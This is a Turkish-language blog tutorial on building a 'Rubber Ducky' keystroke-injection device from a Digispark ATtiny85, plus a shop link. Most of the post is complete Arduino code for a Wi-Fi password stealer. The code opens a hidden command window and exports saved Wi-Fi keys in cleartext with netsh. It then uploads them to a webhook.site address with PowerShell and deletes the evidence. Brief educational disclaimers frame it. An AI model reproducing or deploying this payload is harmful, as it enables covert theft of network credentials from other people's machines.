Bu yazıda, ATtiny85 mikrodenetleyicisi kullanarak bir Rubber Ducky cihazı oluşturacağız.
ATtiny85'i bilgisayarımıza bir klavye olarak tanıtarak, bazı komut betiklerini çalıştıracağız. Bu anlatımlar eğitim amaçlıdır ve bu tür tehlikelerden korunmak için bu yazıdan faydalı bilgiler çıkarabilirsiniz. Özellikle, ATtiny85'in doğrudan USB üzerinden bağlanması işlemlerinizi kolaylaştıracaktır.
Kurulum:ATtiny85'i kullanabilmek için öncelikle Arduino IDE'ye ATtiny kütüphanelerini ve gerekli sürücüleri kurmalısınız. ATtiny85 için oluşturulmuş birçok kötü amaçlı payload kodu bulunmaktadır ve bu payload'ları bilmek, bu tür tehlikelerden korunmak için faydalı olabilir. Bu yazıda, MTK911 adlı GitHub kullanıcısı tarafından oluşturulan Wi-Fi şifre hırsızı payload'ını kullanacağız.
KODLAR AŞAĞIDA VERİLMİŞTİR.
AYRICA CİHAZA ve EĞİTİMİNE SAHİP OLMAK İSTERSENİZ: https://www.shopsgexe.com/product-page/digispark-attiny85 buradan bilgi alabilirsiniz.
#include "DigiKeyboard.h"#define KEY_DOWN 0x51 // Aşağı Ok Tuşu#define KEY_ENTER 0x28 // Enter Tuşuvoid setup() { pinMode(1, OUTPUT); // Model A'da LED}void loop() { DigiKeyboard.update(); DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(3000); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Çalıştır DigiKeyboard.delay(100); DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); // Küçük cmd penceresi DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); // Menü DigiKeyboard.sendKeyStroke(KEY_M); // Taşıma Modu for(int i = 0; i < 100; i++) { DigiKeyboard.sendKeyStroke(KEY_DOWN); } DigiKeyboard.sendKeyStroke(KEY_ENTER); // Kaydırmadan Çık DigiKeyboard.delay(100); DigiKeyboard.println("cd %temp%"); // Geçici Dizin DigiKeyboard.delay(500); DigiKeyboard.println("netsh wlan export profile key=clear"); // WiFi şifrelerini çek DigiKeyboard.delay(500); DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); // Şifreleri ayıkla DigiKeyboard.delay(500); DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/<WEBHOOK-ADRESİNİZ> -Method POST -InFile Wi-Fi-PASS"); // Şifreleri gönder DigiKeyboard.delay(1000); DigiKeyboard.println("del Wi-* /s /f /q"); // Dosyaları sil DigiKeyboard.delay(100); DigiKeyboard.println("exit"); DigiKeyboard.delay(100); digitalWrite(1, HIGH); // LED'i yak DigiKeyboard.delay(90000); digitalWrite(1, LOW); DigiKeyboard.delay(5000); } Açıklama:Bu kod, ATtiny85'i bilgisayara bir klavye girdisi olarak tanıtarak çalışır. Bu nedenle, antivirüs yazılımları bu tür bir saldırıya karşı hazırlıklı değilse, veri ihlali riski oluşabilir. Klavye girdisi olarak tanınan ATtiny85, Powershell komut satırını açarak Wi-Fi şifrelerini çeker ve webhook.site üzerinden bu verileri iletir.
Depolama Seçenekleri:Wi-Fi verilerini ATtiny85'in EEPROM'una ya da harici bir EEPROM entegresine veya SD Kart modülüne kaydedebilirsiniz. Ancak, burada bu saldırının ne kadar hızlı ve etkili olduğunu görmek için webhook kullanımını tercih edebilirsiniz.
Örnek Webhook URL: Her bağlantıda size farklı bir unique URL sağlayan webhook.site, programın ilgili kısmına girilecek URL ile takip edilebilir.
Bu yazıdaki bilgileri kötü amaçlı kullanmak yasadışıdır ve etik dışıdır. Lütfen yalnızca eğitim amacıyla ve güvenlik testi amacıyla kullanın.
Comentarios